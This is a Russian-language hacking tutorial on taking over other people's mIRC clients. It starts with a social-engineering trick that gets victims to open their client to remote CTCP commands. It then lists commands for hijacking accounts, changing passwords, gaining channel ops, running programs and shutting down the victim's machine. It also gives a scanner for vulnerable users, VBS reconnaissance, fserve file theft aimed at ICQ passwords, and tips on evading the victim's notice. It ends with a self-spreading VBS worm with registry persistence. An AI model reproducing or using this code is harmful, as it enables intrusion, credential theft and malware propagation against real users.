Для начала надо расказать о самой уязвимости =))
Нет лёгких методов взлома, но взлом irc будет достаточно прост если вам удастся выполнить миссию и заставить пользователя набрать нужную вам команду.
Команда: //write St1m.log ctcp 1:*:?:$1- | Load -rs St1m.log
Что делает ета простая команда?!
Всё очень легко =))
//write St1m.log ctcp 1:*:?:$1- = записывает в корень irc файл под названием St1m.log в котором содержится ctcp 1:*:?:$1-
Собсно рассомтрим ctcp 1:*:?:$1- слово ctcp говорит о том что ето маска на ctcp команды цифра 1 означает что пользователь с уровнем 1 (тоесть все =)) может посылать вам ctcp запросы. Далее идём маска :*:?: которая разрешает все запросы и в самом конце идентификатор $1- который возвращает все ващи команды.
Так что вам надо всеголишь заставить пользователя ввести данную строку в своём мирке после чего он создаст для себя уязвимость.
Вот некоторые команды:
Сделать чтоб юзер зашёл на канал: /ctcp NICK /j #CHANNEL
Юзер покидает канал: /ctcp NICK /part #CHANNEL
Послать сообщение от имени жертвы: /ctcp NICK /msg #CHANNEL OUR MESSAGE…
Послать приватное сообщение от имени жертвы: /ctcp NICK /msg NICK(anyone) OUR MESSAGE…
Закрыть mirc жертвы: /ctcp NICK /exit
Сменить жертве пароль: /ctcp NICK /msg nickserv set passwd NEW_PASS
Сменить жертве ник: /ctcp NICK /nick NeW_NicK
Если жертва является опом то следующей командой вы заставляете её дать вам опа на канале: /ctcp NICK /mode #channel +o OUR_NICK
Выполнить на компьютере жертвы команду MS-DOS: /ctcp NICK /run command
Открыть mirc на компьютере жертвы: /ctcp NICK /run mirc
Запустить редактор реестра на компе жертвы: /ctcp NICK /run regedit
Флуд на компе жертвы: /ctcp NICK /timer1 0 0 /ping $me
Вырубить винду на компе жертвы: /ctcp NICK /run exitwindows
такмс…
Уже нетерпиться попробовать ето все на практике, но какже посмотреть на мирк сервере есть ли уже люди которые ввели ету строчку???
Скрипт скана мирк серверов
#SCAN
alias mass {
set %i 1
var %massmsgmsg Yes
set %nickme $me
:next
set %nick $nick(#,%i)
if (%nick == $null) goto done
if (%nick != $me) { /ctcp %nick /msg %nickme %massmsgmsg }
inc %i
goto next
:done
}
Я думаю тут все понятно и без обьяснений =))
Так… теперь мы можем найти пользователя на канале с уязвимостью и сможем пошутить над ним, но какже быть с более серьёзными атаками
Минус в том что ети команды не обрабатывают идентификаторы, но зачемже тогда команда /write =)))
так вот пример атаки и сбора сведений о компьютере жертвы
___________________________________________________________________________
—- > Узнаю в какой директории лежит Мирк .exe
[06:59:12] -> [[SF]Norfolk] /WRITE fool.txt /notice Кевин_Митник $mircdir
[06:59:56] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[06:59:58] -[SF]Norfolk- D:Мирка
—- > Узнаю на каком диске находится WINDOWS
[07:02:21] -> [[SF]Norfolk] /WRITE fool.vbs set FSO = createobject(«scripting.filesystemObject»)
[07:02:33] -> [[SF]Norfolk] /WRITE fool.vbs set dirwin = fso.getspecialfolder(0)
[07:02:46] -> [[SF]Norfolk] /WRITE fool.vbs set text = fso.createtextfile(«fool.txt»)
[07:02:59] -> [[SF]Norfolk] /WRITE fool.vbs text.writeline «/notice Кевин_Митник» & » » & dirwin
[07:03:09] -> [[SF]Norfolk] /WRITE fool.vbs text.close
[07:03:36] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[07:03:38] -[SF]Norfolk- C:WINDOWS
—- > Очищаю документы
[07:05:36] -> [[SF]Norfolk] /WRITE -c fool.txt
[07:05:39] -> [[SF]Norfolk] /WRITE -c fool.vbs
____________________________________________________________________________
Как вы уже поняли можно записывать файлы на компьютер жертвы и потом проигрывать их для определённого канала.
ВНИМАНИЕ: Жертва видит что отсылает вам нотисы, так что советую использовать ето когда мирк жертвы свёрнут в трей или жертвы нет у компьютера. И не забывайте чистить файлы а лучше удалять их с компьютера жертвы.
Лучше всего выключать компьютер жертве командой /ctcp NICK /RUN shutdown.exe -s -f -t 00
Вот некоторые идентификаторы которые помогут тебе собрать нужную информацию
OS — $os
Host — $host
email — $emailaddr
Название лога который лежит в папке под номером 100 — $findfile($mircdirlogs,*.*,100)
$disk(C:) — C: если диск существует то вам веррнется $true
$disk(D:) — D:
$disk(E:) — E:
mirc folder — $mircdir
Следующий пример неработает в некоторых irc серверах
Вы должны заставить жертву набрать следующее:
/fserve OUR_NICK 4 c:
После этого диск C: компьютера жертвы будет открыт для вас. И вы сможете делать следующее:
Команды:
cd : С помощью этой команды вы можете перейти в любую папку.
Например: cd windows (попадёте в папку windows)
dir : Команда как в MS-DOS
get : Важная команда! Вы можете получить любые файлы с компьютера жертвы. Жертва видит передачу файлов, но если получать маленькие по обьёму файлы то передача будет очень быстрой и жертва может просто не заметить этого.
read: Чтение текстовых файлов.
Вы можете получить пароль от ICQ жертвы. Используя команду get получаете файл .dat и можете получить пароль от ICQ.
Дальше больше.
Попробуем написать вирус который будет рассылать себя по мирку и заражать траянчегом их
set FSO = createobject(«scripting.filesystemObject»)
set scriptini = fso.CreateTextFile(«C:Program Filesscript.ini»)
set virus = FSO.getfile(wscript.scriptfullname)
Set S = CreateObject(«Wscript.Shell»)
mircfile = «»&»St1m.jpg .vbs»
virus.copy(dirsystem&mircfile)
mircoff = dirsystem&mircfile
S.regwrite «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesKernel32″, mircoff
scriptini.WriteLine «[script]»
scriptini.WriteLine «n0= on 1:JOIN:#:{»
scriptini.WriteLine «n1= if ( $nick == $me ) { halt }»
scriptini.WriteLine «n2= /dcc send $nick» &» «&mircoff
scriptini.WriteLine «n3= on 1:JOIN:#:{ »
scriptini.WriteLine «n4 /write St1m.st ctcp 1:*:?:$1- | Load -rs St1m.st »
scriptini.WriteLine «n5 }»
set f = fso.GetFolder(«C:Program Files»)
set sf = f.SubFolders
for each f1 in sf
set viruss = FSO.getfile(«C:Program Filesscript.ini»)
file1 =»»&»script.ini»
viruss.copy(f1&file1)
next
Если мирк находится или будет находиться в Program Files то етот скрипт его обезательно заразит и начнёт сам себя рассылать всем кто присоединяется к каналам на которых сидит жертва. Даже если жертва удалит мирк и переустановит её то после перезагрузки новый мирк опять заразится.